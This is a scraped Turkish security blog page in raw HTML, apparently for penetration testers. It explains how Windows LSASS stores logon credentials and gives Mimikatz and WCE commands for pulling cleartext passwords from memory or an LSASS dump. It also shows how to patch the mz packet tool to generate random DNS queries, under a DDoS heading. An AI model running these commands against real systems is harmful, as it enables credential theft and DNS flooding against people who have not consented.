cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAgKMFtvqhm7Rhslb1G5h3_H0cTQ7PaD-AiguLgVs_2Pd3FNWiBMRviGOUeJzW0Jreu-hXSSYTIachKcqn3CwzO3jgah1jrgjmAew7hYMd6mhRYhjGnzzCooqoXt7L3Iz3-35xc7Y4-bU/s1600/12.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAgKMFtvqhm7Rhslb1G5h3_H0cTQ7PaD-AiguLgVs_2Pd3FNWiBMRviGOUeJzW0Jreu-hXSSYTIachKcqn3CwzO3jgah1jrgjmAew7hYMd6mhRYhjGnzzCooqoXt7L3Iz3-35xc7Y4-bU/s320/12.png" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Elde edilen proses dump dosyasının ve diğer araçların listelenmesi</td></tr></tbody></table><br /><div style="text-align: justify;">Daha önceden bahsedilen adımlar uygulanarak dump dosyasından kullanıcı ve parola bilgileri elde edilir. Kullanılan komutlar şu şekildedir:</div><blockquote class="tr_bq"><i>mimikatz.exe</i><br /><i>sekurlsa::minidump Hedef_LSASS.dmp</i><br /><i>sekurlsa::logonPasswords</i></blockquote><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7eD5UHBbKNYsqfXyHDk6CKh83Fy03KXyligs3FN8jiad0n2d0SnTrAs3Ajq0ap3ijEkDzB9cQezzbhcImGboFqhwHKRFEYrJTN_DGghbkwvowciiuBIVE46hPKErivnN_1P_bhbDThkE/s1600/13.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7eD5UHBbKNYsqfXyHDk6CKh83Fy03KXyligs3FN8jiad0n2d0SnTrAs3Ajq0ap3ijEkDzB9cQezzbhcImGboFqhwHKRFEYrJTN_DGghbkwvowciiuBIVE46hPKErivnN_1P_bhbDThkE/s320/13.png" width="294" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Hedef sistemden alınan proses dump dosyasından parolaların çekilmesi</td></tr></tbody></table><br />

Procdump ve Mimikatz ile LSASS İçerisinden Oturum Açan Kullanıcıların Parolalarını Elde Etme

Mimikatz bir prosesin (içerisinde kimlik bilgileri barındıran LSASS.exe) içinden logon olmuş kullanıcıların parolalarını çekebilmektedir. Bö...

Read more »

MZ TCP/IP Paket Üretim Yazılımı İçin Rastgele DNS Sorgusu Yaması ve DDOS

<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-PeFKfSChxMA/UkFLq6XpCVI/AAAAAAAAAcE/Jzmgb8UVz7E/s1600/ddos.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="http://3.bp.blogspot.com/-PeFKfSChxMA/UkFLq6XpCVI/AAAAAAAAAcE/Jzmgb8UVz7E/s200/ddos.jpg" width="200" /></a></div><div style="text-align: justify;"><a href="http://www.perihel.at/sec/mz/" target="_blank">mz</a> hemen her türde TCP/IP paketleri oluşturmaya imkan sağlayan açık kaynak kodlu bir yazılımdır. Özellikle yük testleri için kullanılan yazılım ile hemen her türde paket üretmeye imkan sağlamaktadır. Yazılım ile ilgili gerekli bilgiye <a href="http://www.perihel.at/sec/mz/">http://www.perihel.at/sec/mz/</a> adresinden erişim sağlanabilir.</div><br /><div style="text-align: justify;"><a href="http://www.perihel.at/sec/mz/" target="_blank">mz</a> ile ön tanımlı olarak sadece hostname için dns sorgusu gerçekleştirilebilmektedir. Örneğin <a href="http://www.agguvenligi.net/">www.agguvenligi.net</a> hostname bilgisi kullanılarak dns sorgusu gerçekleştirmek için aşağıdaki mz komut parametresi kullanılabilir;</div><a name="more"></a><br /># mz eth0 -A 10.7.7.42 -B 192.168.1.2 -t dns "q=<a href="http://www.agguvenligi.net/">www.agguvenligi.net</a>"<br /><br /><div style="text-align: justify;">Yukarıdaki şekilde 10.7.7.42 ip adresinden 192.168.1.2 ip adresli dns sunucusuna <a href="http://www.agguvenligi.net/">www.agguvenligi.net</a> dns sorgusu gönderilecektir. </div><br /><div style="text-align: justify;">Ancak dns sorgusunun belirtilen domain için rastgele sorgular üretmesi veya tamamen rastgele domain üretmesi ön tanımlı olarak bulunmamaktadır. Bunun için geliştirilen yamanın uygulanması gerekmektedir. Bunun için aşağidaki adımlar takip edilmelidir.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Öncelikle mz kurulumu için debian tabanli sistemlerde aşağıdaki paketlerin kurulması gerekmektedir. Bunun için aşağidaki komutların çaliştırılması gerekmektedir.</div><div style="text-align: justify;"></div># apt-get install cmake libpcap-dev libnet1-dev libcli-dev<br /><br /># wget http://www.perihel.at/sec/mz/mz-0.40.tar.gz<br /># tar -zxvf mz-0.40.tar.gz<br /># cd mz-0.40<br /># wget <a href="https://raw.github.com/agguvenligi/yamalar/master/mz_random_dns.patch">https://raw.github.com/agguvenligi/yamalar/master/mz_random_dns.patch</a><br /># patch -p1 < mz.patch<br /># cmake .; make; make install <br /><br /><div style="text-align: justify;">İlgili yamanın uygulanmasının ardından gerekli parametrelerin kullanımı için aşağidaki yönergeler takip edilmelidir.</div><br />Tüm domainleri rastgele olarak üretebilmesi için;<br /># /usr/local/sbin/mz -c 2 -A 37.37.37.37 -B 192.168.1.37 -g random_dns<br />00:00:00.000000 IP 37.37.37.37.42000 > 192.168.1.37.53: 16962+ [b2&3=0x500] A? byd.dXCyVxwP.ZQQ. (34)<br />00:00:00.002096 IP 37.37.37.37.42000 > 192.168.1.37.53: 16962+ [b2&3=0x500] A? ZcJ.VTKZJXde.VaY. (34)<br /><br />Verilen domaini rastgele hale getirmek için ise;<br /># /usr/local/sbin/mz -c 2 -A 37.37.37.37 -B 192.168.1.37 -t dns "q=<a href="http://agguvenligi.net/">agguvenligi.net</a>"<br />00:00:05.482711 IP 37.37.37.37.42000 > 192.168.1.37.53: 16962+ [b2&3=0x500] A? kIQMa.agguvenligi.net. (34)<br />00:00:00.002088 IP 37.37.37.37.42000 > 192.168.1.37.53: 16962+ [b2&3=0x500] A? cZkVi.agguvenligi.net. (34)<br /><br />kullanılmalıdır. Görüldüğü gibi geliştirilem yama ile mz aracına rastgele dns sorguları üretme yeneteği sağlanmaktadır.

MZ TCP/IP Paket Üretim Yazılımı İçin Rastgele DNS Sorgusu Yaması ve DDOS

mz hemen her türde TCP/IP paketleri oluşturmaya imkan sağlayan açık kaynak kodlu bir yazılımdır. Özellikle yük testleri için kullanılan yaz...

Read more »

WCE ve Mimikatz Kullanarak Windows Oturum Parolalarının Açık Halde Elde Edilmesi #2

<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEWXaSNGGssb3cwR5A7Kie10pdwcCuhQ_4Pjt35Ix6cMFnyEVruFB0pl1G7YAblO71tSvbFi1JUBqnjbBOgWt3dmaYfnjueNHR0q6QX2PKmF83DjHta6XfjD__HiHhWGxAUB0YNMZLVbg/s1600/apt.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEWXaSNGGssb3cwR5A7Kie10pdwcCuhQ_4Pjt35Ix6cMFnyEVruFB0pl1G7YAblO71tSvbFi1JUBqnjbBOgWt3dmaYfnjueNHR0q6QX2PKmF83DjHta6XfjD__HiHhWGxAUB0YNMZLVbg/s320/apt.jpg" width="320" /></a></div><div style="text-align: justify;"><a href="http://www.agguvenligi.net/2013/09/wce-ve-mimikatz-ile-windows-parolasi-elde-edilmesi.html">Bir önceki yazıda</a> Windows işletim sisteminde oturum açma sırasında görevli olan prosesler ve bu proseslerin işlevlerinden konumuz dahilinde bahsedilmişti. Ayrıca oturum açma işlemi sırasında kullanıcı bilgilerinin alınacağı arayüzün kullanıcının karşısına çıkarılması, kullanıcıdan gerekli bilgilerin alınması ve bu bilgilerin LSASS prosesine iletilmesine kadar olan adımlar incelenmişti.</div><br /><div style="text-align: justify;">Bu yazıda ise asıl amaç olan parolaların açık bir şekilde elde edilmesinin nasıl mümkün olduğu konusuna değinilecektir. Bu yazı iki bölümden oluşacaktır. Öncelikle LSASS prosesinin parola bilgisini nasıl ele aldığı konusu incelenecek, daha sonra da işletim sisteminin oturum açma mimarisini kötüye kullanan iki aracın (WCE ve Mimikatz) nasıl çalıştığı konusuna değinilecektir.</div><br /><a name="more"></a><br /><b>LSASS ve Windows İşletim Sisteminde Oturum Açma İşlemi</b><br /><b><br /></b><br /><div style="text-align: justify;">Windows işletim sistemi üzerindeki kullanıcı kimlik bilgileri doğrulanma işlemleri için SSPI (Security Support Provider Interface) adı verilen özel bir mimari tasarlanmıştır. Kimlik doğrulaması ile ilgili tüm çağrılar (call) bu mimari temelinde ele alınır. Böylece hem Windows kimlik doğrulama mekanizmasını koruma altına almakta, hem de kendi kimlik doğrulama mekanizmalarını kullanmak isteyen geliştiricilerin Windows’un kullandığı kimlik doğrulama mekanizmalarının derinliklerine dalmasına gerek kalmamaktadır. Bu mimariyi tasarlayanlar, kimlik doğrulama işlemini istemci üzerinde (local) veya uzak bir sunucu ile istemci arasında (remote) güvenilir olarak gerçekleştirilmesini hedeflemişlerdir. Windows 7 ve Windows Server 2008 R2 mimarisindeki varsayılan kimlik doğrulama sağlayıcıları (Security Support Provider - SSP), sisteme yüklenen DLL’leri kullanarak kimlik doğrulama işlemlerini gerçekleştirirler.</div><br /><div style="text-align: justify;">Kimlik bilgisi sağlayıcılarından (CP) geçen kimlik bilgileri Winlogon prosesine eriştiği konusuna değinilmişti. Winlogon prosesi LSASS prosesinin LsaLookupAuthenticationPackage fonksiyonunu çağırarak, bilgisayarın desteklediği bütün kimlik doğrulama paketlerinin (authentication packages) listesini elde eder. Winlogon prosesi, bu sefer LSASS prosesinin LsaLogonUser fonksiyonunu çağırarak, kimlik bilgisi sağlayıcısı (CP) için gerekli olan pakete kimlik bilgileri gönderir. Örneğin, MSV1_0.dll paketine kullanıcı adı ve şifre bilgisini gönderir.</div><br /><div style="text-align: justify;">Yerel bir sistem çağrısı ile gerçekleştirilen oturum açma işlemi temel olarak aşağıdaki gibi gerçekleşmektedir.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWb-qG4QZVsR9ND_Ce9vVd3CVEGbquK7e8HOZH42PLrUyBiidfSbvQsZceDbwj1KkIvWQ-KDocUXWqggsWAmC0LkqmkVcmt0xC6uttB0mVdxfCbpBaVFKynHyQ79ASFitcR05jg8BUY_Y/s1600/Wce&Mimikatz_10.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWb-qG4QZVsR9ND_Ce9vVd3CVEGbquK7e8HOZH42PLrUyBiidfSbvQsZceDbwj1KkIvWQ-KDocUXWqggsWAmC0LkqmkVcmt0xC6uttB0mVdxfCbpBaVFKynHyQ79ASFitcR05jg8BUY_Y/s400/Wce&Mimikatz_10.gif" width="400" /></a></div><br /><div style="text-align: justify;">Kullanıcıdan alınan kimlik bilgileri yukarıda belirtildiği şekliyle ilgili SSP (Security Support Provider) tarafından sağlanan DLL’e aktarılır. Windows 7 ve Windows Server 2008 R2 sistemlerde varsayılan olarak bulunan güvenlik destek sağlayıcıları (SSP) ve kullandıkları DLL’ler şu şekildedir:</div><ul><li>Credential Security Support Provider - credssp.dll</li><li>Digest Security Support Provider - digest.dll</li><li>Kerberos Security Support Provider - kerberos.dll</li><li>Negotiate Security Support Provider - lsasrv.dll</li><li>Negotiate Extensions Security Support Provider - negoexts.dll</li><li>NTLM Security Support Provider - msv1_0.dll</li><li>PKU2U Security Support Provider - pku2u.dll</li><li>Schannel Security Support Provider - schannel.dll</li></ul><div style="text-align: justify;">Bunların yannda Wdigest.dll, Kdcsvc.dll, Ntdsa.dll, Ntdsapi.dll vs gibi LSA bileşenleri de kimlik doğrulama işlemlerinde görev alır.</div><br /><div style="text-align: justify;">İşletim sisteminde kimlik doğrulama paketleri mevcut olduğu halde LSA (Local Security Authority) tarafından belleğe yükleme işleminin gerçekleşmezse bu DLL’ler kullanılamaz. Bu sebeple LSA tarafından bu paketler belleğe yüklenmelidir. LSA, hangi DLL dosyalarını yükleyeceğini kayıt defterindeki “<b>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</b>” kaydından alır. Bu kayıtta bulunmayan paketler belleğe yüklenmeyecek ve bu sebeple tercih edilen modda kimlik doğrulamasu gerçekleşmeyecektir.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUMHYMbntvhaFOh4IgKC8MlVcGUV4llZlmC3xUFRKNTLgCgyYl7FExXdwUd0XZRhDXoz_W8_UUllX7pM9vnyajaTJMIA3-iEJRJNsT8UadjHKY_U7nomWZqqTTer3tiVFLC65ekQX8O3U/s1600/Wce%2526Mimikatz_11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUMHYMbntvhaFOh4IgKC8MlVcGUV4llZlmC3xUFRKNTLgCgyYl7FExXdwUd0XZRhDXoz_W8_UUllX7pM9vnyajaTJMIA3-iEJRJNsT8UadjHKY_U7nomWZqqTTer3tiVFLC65ekQX8O3U/s400/Wce%2526Mimikatz_11.png" width="400" /></a></div>SSP ve kimlik doğrulama paketleri ile ilgili ayrıntılı bilgi için bakınız:<br /><blockquote class="tr_bq"><a href="http://technet.microsoft.com/en-us/library/dn169026(v=ws.10).aspx" target="_blank"> http://technet.microsoft.com/en-us/library/dn169026(v=ws.10).aspx</a> <br /><a href="http://technet.microsoft.com/en-us/library/dn169016(v=ws.10).aspx" target="_blank"> http://technet.microsoft.com/en-us/library/dn169016(v=ws.10).aspx</a> <br /><a href="http://msdn.microsoft.com/en-us/library/aa374733(v=vs.85).aspx" target="_blank">http://msdn.microsoft.com/en-us/library/aa374733(v=vs.85).aspx </a> </blockquote><div style="text-align: justify;">Sonuç olarak belleğe yüklenen DLL, kendisine açık olarak gelen kimlik bilgilerini alır ve işler. Yerel bilgisayarda yerel bir hesap için kimlik doğrulama işleminde MSV1_0.dll, etki alanındaki bir bilgisayarda etki alanı hesabı için kimlik doğrulama işleminde ise kerberos.dll kütüphaneleri çağırılabildiği gibi, bir oturum kullanılarak başka sistemlerde de oturum açılması (Single Sign-on) belleğe yüklenen bu kütüphaneler kullanılarak gerçekleştirilir.</div><br /><div style="text-align: justify;">Kimlik doğrulama paketleri (authentication packages), bazı fonksiyonları kullanarak, parolayı (veya parolanın özetini) geri döndürülebilir olacak şekilde şifreli olarak saklamaktadır. Örneğin, standart Win32 fonksiyonlarından olan LsaProtectMemory fonksiyonunu kullanarak belirli bir adresten (Buffer) başlayarak belirli uzunluktaki (Buffer Size) bir bellek adres uzayını (memory address space)  şifrelerken, LsaUnProtectMemory fonksiyonu ise aldığı parametrelere göre şifre çözme işlemini gerçekleştirir. Şifreleme işleminde kullanılan anahtarlar, bilgisayar ilk olarak başlatıldığında LSASS prosesi içerisindeki fonksiyonlar tarafından üretilir. LsalnitializeProtectedMemory fonksiyonu bu anahtarı üreterek LsaEncryptMemory  fonksiyonunun kullanımına sunar. Şifrelenen veri, DLL’e göre, parola olabildiği gibi parolanın özeti de olabilir. Örneğin, MSV1_0.dll parolanın LM ve NTLM özet halinin şifresini saklamaktayken, wdigest.dll veya kerberos.dll ise parolanın kendisinin şifreli halini saklamaktadır. Böylece gerekli durumlarda (SSO gerektiren işlemler gibi) bu bilgiler, LSASS tarafından üretilen anahtar yardımı ile açık olarak elde edilebilmekte (parola veya parola özeti olarak) ve kimlik doğrulama işlemlerinde kullanılmaktadır.</div><br /><div style="text-align: justify;">Kimlik bilgilerinin bu şekilde (açık veya MSV1_0.dll için özet haline geri döndürülebilir olarak RAM üzerinde şifreli şekilde) saklandığı durumlardan bazıları aşağıdaki gibidir:</div><ul><li>Bilgisayar başında konsoldayken oturum açıldığında,</li><li>RDP ile uzak masaüstü bağlantısı yapıldığında,</li><li>RunAs komutu kullanarak bir işlem gerçekleştirildiğinde,</li><li>Belirli bir kullanıcı hakkı ile servis çalıştırıldığında, </li><li>Kimlik doğrulaması için tasarlanan mimarideki bazı API’leri kullanan uygulamalarla işlemler gerçekleştirildiğinde, vs.</li></ul><div style="text-align: justify;">Bu noktadan sonraki konular yazının kapsamı dışında olduğu için değinilmeyecektir. Aşağıdaki resim kimlik doğrulamanın sonraki aşamalar için fikir vermektedir.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNlt53hO2gWMJVTQ0WnoUiPHCpDEppHiwG85gG5BG-yiklPTjb7c7VqVzg0PizZsZFkFh6xnHHf897GTm_iNldwVqNMrzQO6V7MHciYh3b95rnc4rVebRUcVeR-LdnhjCAGeG9tNJiUoM/s1600/Wce%2526Mimikatz_12.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNlt53hO2gWMJVTQ0WnoUiPHCpDEppHiwG85gG5BG-yiklPTjb7c7VqVzg0PizZsZFkFh6xnHHf897GTm_iNldwVqNMrzQO6V7MHciYh3b95rnc4rVebRUcVeR-LdnhjCAGeG9tNJiUoM/s400/Wce%2526Mimikatz_12.gif" width="390" /></a></div><br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Oturum açma işlemini bu yazı için tek bir cümleyle şu şekilde özetleyebiliriz: Oturum açmak için yazdığımız kullancı adı ve parola gibi bilgiler, belleğe (RAM) yüklenen ve kimlik doğrulama işleminde görev alan bazı kütüphane dosyalarında şifreli olarak saklanmakta ve bu bilgiler kimlik doğrulama işlemleri sırasında işlenmektedir. Aşağıdaki resim oturum açma işlemini özetlemektedir:</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDjX89ge1wXPaLN4cCwP2Sf-197NLNbgN5RKdUW31wodM94msJPP8HGGG56ZVIBn3pKlcSbfs0rVe5NJuWo7PBtLZcZ77VJXm36EJZKT93tlpnm6Hu-qMp-2kz9qrypaTozNMQY9nRnDY/s1600/Wce%2526Mimikatz_13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDjX89ge1wXPaLN4cCwP2Sf-197NLNbgN5RKdUW31wodM94msJPP8HGGG56ZVIBn3pKlcSbfs0rVe5NJuWo7PBtLZcZ77VJXm36EJZKT93tlpnm6Hu-qMp-2kz9qrypaTozNMQY9nRnDY/s400/Wce%2526Mimikatz_13.png" width="400" /></a></div><br /><br /><b>WCE ve Mimikatz Araçlarının Kullanımı</b><br /><b><br /></b><br /><div style="text-align: justify;">WCE ve Mimikatz araçları temel olarak RAM’de bulunan kimlik doğrulama paketlerindeki (authentication packages) kimlik bilgilerini (şifreli parola ve parola özetlerini, kullanıcı adı gibi) okur, parolayı (ve MSV1_0.dll için parola özetini) şifreleyen şifreleme anahtarını elde eder ve şifreli parola (ve parola özetini) elde eder.</div><div style="text-align: justify;">Bu araçları aşağıdaki bağlantıları kullanarak indirebilirsiniz:</div><ul><li>WCE:</li></ul><blockquote class="tr_bq"><a href="http://www.ampliasecurity.com/research/wcefaq.html#curversion" target="_blank"> http://www.ampliasecurity.com/research/wcefaq.html#curversion</a> </blockquote><ul><li>Mimikatz:</li></ul><blockquote class="tr_bq"><a href="http://blog.gentilkiwi.com/mimikatz" target="_blank"> http://blog.gentilkiwi.com/mimikatz</a> </blockquote><br />Bu araçları kullanarak oturumlardaki parolaları elde etmek şu şekilde gerçekleşir:<br /><ul><li>WCE:</li></ul><blockquote class="tr_bq">wce.exe -w</blockquote><ul><li>Mimikatz:</li></ul><blockquote class="tr_bq">mimikatz.exe</blockquote><blockquote class="tr_bq">privilege::debug</blockquote><blockquote class="tr_bq">sekurlsa::logonPasswords full</blockquote><br /><div style="text-align: justify;">Bu araçların kullanılması ile ilgili bir senorya şu şekildedir: SIRKET etki alanındaki bir bilgisayarda, “Kurban” adlı bir etki alanı kullanıcısı ve “Yerel Yonetici” adlı yerel kullanıcı oturum açık durumdadır. Bu senaryoda, RAM üzerinde bu iki kullanıcının oturum açma işlemi sırasında kullanılan kimlik doğrulama paketlerinden (authentication packages) parola bilgilerinin şifresi çözülerek alınabilir. Bu işlemlere ait ekran görüntüleri aşağıdaki gibidir.</div><ul><li>WCE aracı için:</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOFiEiyRRp9bx7A12YbCNfPcoIyiCesY-x3Et1cq3S4qecXjWWEj1NzqcYsSyo_lTen8nF1grgDbr9g2GJ6tQ-LQw6H9YyVDE9H9zNbXqT01RldVVe2BpjU2hfSNvcSGPcDNHtXe_14bw/s1600/Wce%2526Mimikatz_14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="65" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOFiEiyRRp9bx7A12YbCNfPcoIyiCesY-x3Et1cq3S4qecXjWWEj1NzqcYsSyo_lTen8nF1grgDbr9g2GJ6tQ-LQw6H9YyVDE9H9zNbXqT01RldVVe2BpjU2hfSNvcSGPcDNHtXe_14bw/s400/Wce%2526Mimikatz_14.png" width="400" /></a></div><br /><div style="text-align: justify;"><b>Not:</b> Bir bilgisayarın da parolası vardır. Ancak bu yazının kapsamı dışında olduğu için bu konuya girilmeyecektir.</div><ul><li>Mimikatz aracı için:</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfdPVlB0Ywa3MZGZEwzOWWKGnnPejWqRBGj3jV4wNxkDXiNNijTVIx2qpSsS0O97G5Cmfni8u_MXXRdjhNDwFYkCRl1Y8UZbsDBm9Qa-z4A3Wmutxdwi2NDc_pEIWD3oAtGBIES33AIHE/s1600/Wce%2526Mimikatz_15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfdPVlB0Ywa3MZGZEwzOWWKGnnPejWqRBGj3jV4wNxkDXiNNijTVIx2qpSsS0O97G5Cmfni8u_MXXRdjhNDwFYkCRl1Y8UZbsDBm9Qa-z4A3Wmutxdwi2NDc_pEIWD3oAtGBIES33AIHE/s400/Wce%2526Mimikatz_15.png" width="367" /></a></div><br /><div style="text-align: justify;">Yukarıdaki ekran görüntüsünde de görüldüğü gibi iki işlem gerçekleştirilir. Öncelikle yetkilendirme yapılır sonra da DLL enjeksiyonu ile istenen bilgiler elde edilir. Normalde bir kullanıcı sadece yetkisi olduğu bir proses üzerinde geniş yetkiye sahip olur, başka bir hesap (kullanıcı hasabı, servis hesabı ve SİSTEM hesabı dahil) tarafından oluşturulan bir proses üzerinde çok kısıtlı hakları bulunmaktadır. Eğer, SYSTEM kullanıcısının bir prosesine (LSASS.exe gibi) DLL enjeksiyonu gibi kritik bir işlem gerçekleştirilecekse, bu proses üzerinde SeDebugPrivilege yetkisine sahip olunmalıdır. Bu yetkiye sahip olunduktan sonra, sekurlsa.dll kütüphanesi LSASS.exe prosesine enjekte edilerek, yasal fonksiyonları (LsaUnProtectMemory, LsaEncryptMemory vs) kullanır ve kimlik doğrulama paketlerindeki parola bilgileri elde edilir.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Windows üzerinde çalıştırılan Mimikatz uygulamasının sonuçlarının kullanıcı adı ve parola formatında satır satır almak için aşağıdaki betik kullanılabilir:</div><blockquote class="tr_bq"><a href="https://github.com/agguvenligi/araclar/blob/master/parse_mimikatz_result.sh" target="_blank">https://github.com/agguvenligi/araclar/blob/master/parse_mimikatz_result.sh </a> </blockquote><div style="text-align: justify;"><b>Not:</b> Windows 7 sistemlerde varsayılan olarak disk üzerinde (SAM dosyasında) LM özetler tutulmamaktadır. Ancak RAM üzerinde bu bilgi bulunmaktadır. Yukarıdaki ekran görüntüsünde “Yerel Yonetici” adlı kullanıcının parolasının LM ve NTLM özetlerinin elde edildiği görülmektedir. WCE aracı kullanılarak da bu bilgi elde edilebilir:</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoN4oJpVFgTBeTuxR6CEvjBqhBQOxMlxZSuCsHibCmT7k4D7Fl21O9bojG0UMZww35z26aFho2j_Z2rZpOEDDjnA1drTxnaTqpjP8yq6OWQHWvQsVG7I1-Mkr3p4VdkT8TuRVTRcXUE4o/s1600/Wce%2526Mimikatz_16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="53" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoN4oJpVFgTBeTuxR6CEvjBqhBQOxMlxZSuCsHibCmT7k4D7Fl21O9bojG0UMZww35z26aFho2j_Z2rZpOEDDjnA1drTxnaTqpjP8yq6OWQHWvQsVG7I1-Mkr3p4VdkT8TuRVTRcXUE4o/s400/Wce%2526Mimikatz_16.png" width="400" /></a></div><br /><div style="text-align: justify;">Bir önceki başlıkta LSASS prosesinin adres uzayında kullanıcı parolasını (ve parolasının özetini) şifrelemek için kullanılan anahtar da bulunmakta olduğu belirtilmişti. Bu sebeple LSASS prosesinin dump’ı alınarak aynı mimaride farklı bir bilgisayara aktarılırsa, RAM üzerindeki bilgiler aktarılan makineden de alınabilir. Bu konu ile ilgili örnek bir yazı için bakınız:</div><blockquote class="tr_bq"><a href="http://www.agguvenligi.net/2013/10/procudmp-ve-mimikatz-ile-lsass-icerisinden-oturum-acan-kullanicilarin-parolalarini-elde-etme.html">http://www.agguvenligi.net/2013/10/procudmp-ve-mimikatz-ile-lsass-icerisinden-oturum-acan-kullanicilarin-parolalarini-elde-etme.html</a></blockquote><div style="text-align: justify;"><b>Not:</b> Bazı sistemler kimlik doğrulama işlemi gerçekleştirirken kimlik doğrulama paketlerinde kimlik bilgilerini saklarlar. Bu sistemlerden birisi de Exchange sunucularıdır. Bu sebeple, sızma testlerinde mimikatz uygulaması Exchange sunucularda çalıştırılırsa, tüm kullanıcıların parola bilgileri açık halde elde edilebilir.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Bu araçların RAM üzerindeki parolaların açık halde elde edebilmeleri haricinde daha bir çok kabiliyeti bulunmaktadır. Ancak diğer kabiliyetler bu yazının kapsamı dışında olduğu için değinilmemektedir. Bu araçların kullanımı için araçların indirildiği sayfalardaki bağlantılar ve aşağıdaki bağlantı sayfası kullanılabilir:</div><blockquote class="tr_bq"><a href="http://danielaelmi.altervista.org/password-cracking-hashes-dumping-brute-forcing-auditing-and-privileges-escalation/" target="_blank"> http://danielaelmi.altervista.org/password-cracking-hashes-dumping-brute-forcing-auditing-and-privileges-escalation/</a> </blockquote><br /><b>Kaynaklar: </b><br /><b><br /></b><a href="http://www.bilgiguvenligi.gov.tr/microsoft-guvenligi/windows-isletim-sisteminde-oturum-acma-islemi-winlogon.html" target="_blank"> http://www.bilgiguvenligi.gov.tr/microsoft-guvenligi/windows-isletim-sisteminde-oturum-acma-islemi-winlogon.html </a> <br /><a href="http://msdn.microsoft.com/tr-tr/magazine/cc163489(en-us).aspx" target="_blank"> http://msdn.microsoft.com/tr-tr/magazine/cc163489(en-us).aspx </a> <br /><a href="http://technet.microsoft.com/en-us/library/ff404303(v=ws.10).aspx" target="_blank"> http://technet.microsoft.com/en-us/library/ff404303(v=ws.10).aspx </a> <br /><a href="http://blog.bga.com.tr/2013/01/mimikatz-ile-windows-sistemlerde.html" target="_blank"> http://blog.bga.com.tr/2013/01/mimikatz-ile-windows-sistemlerde.html</a><br /><a href="http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html" target="_blank"> http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html </a> <br /><a href="http://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx" target="_blank"> http://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx </a> <br /><a href="http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf" target="_blank"> http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf </a> <br /><a href="http://www.ampliasecurity.com/research/WCE_Internals_RootedCon2011_ampliasecurity.pdf" target="_blank"> http://www.ampliasecurity.com/research/WCE_Internals_RootedCon2011_ampliasecurity.pdf </a> <br /><a href="http://codeidol.com/community/windows/logon/25019/" target="_blank">http://codeidol.com/community/windows/logon/25019/</a><br /><a href="http://fr.slideshare.net/gentilkiwi/mimikatz-asfws" target="_blank"> http://fr.slideshare.net/gentilkiwi/mimikatz-asfws </a> <br /><a href="http://danielaelmi.altervista.org/password-cracking-hashes-dumping-brute-forcing-auditing-and-privileges-escalation/" target="_blank"> http://danielaelmi.altervista.org/password-cracking-hashes-dumping-brute-forcing-auditing-and-privileges-escalation/ </a> <br /><a 